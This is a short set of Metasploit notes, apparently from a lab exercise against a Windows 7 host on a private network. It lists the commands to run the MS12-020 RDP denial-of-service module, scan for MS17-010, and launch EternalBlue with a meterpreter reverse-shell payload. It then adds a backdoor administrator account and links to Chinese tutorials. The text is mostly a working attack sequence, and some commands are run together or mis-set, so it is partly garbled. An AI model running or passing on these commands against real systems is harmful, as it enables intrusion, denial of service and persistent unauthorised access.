msfconsole

search 12_020

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

show options

ipconfig

netstat -ano











set RHOST 192.168.74.134
set RPORT 3389

show options

exploit


msfconsole

search 17_010

use auxiliary/scanner/smb/smb_ms17_010 show options



set RHOST 192.168.74.134/24show options

run

search ms17_010

use exploit/windows/smb/ms17_010_eternalblue show options

set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134 show options

run

net user admin 123456 /add

net user

[win7旗舰版怎么开启3389端口?](win7旗舰版怎么开启3389端口?_百度知道 (baidu.com))
[win7怎么打开端口](win7怎么打开端口-百度经验 (baidu.com))
[Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞](Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞 - 哔哩哔哩专栏 (bilibili.com))
[关于使用msf渗透攻击Win7主机并远程执行命令的复习]((1条消息) 关于使用msf渗透攻击Win7主机并远程执行命令的复习_LIKEQC的博客-CSDN博客_msf攻击win7)
msfconsole利用ms17-010和ms12-020攻击
原文:https://www.cnblogs.com/Lin1031/p/14720382.html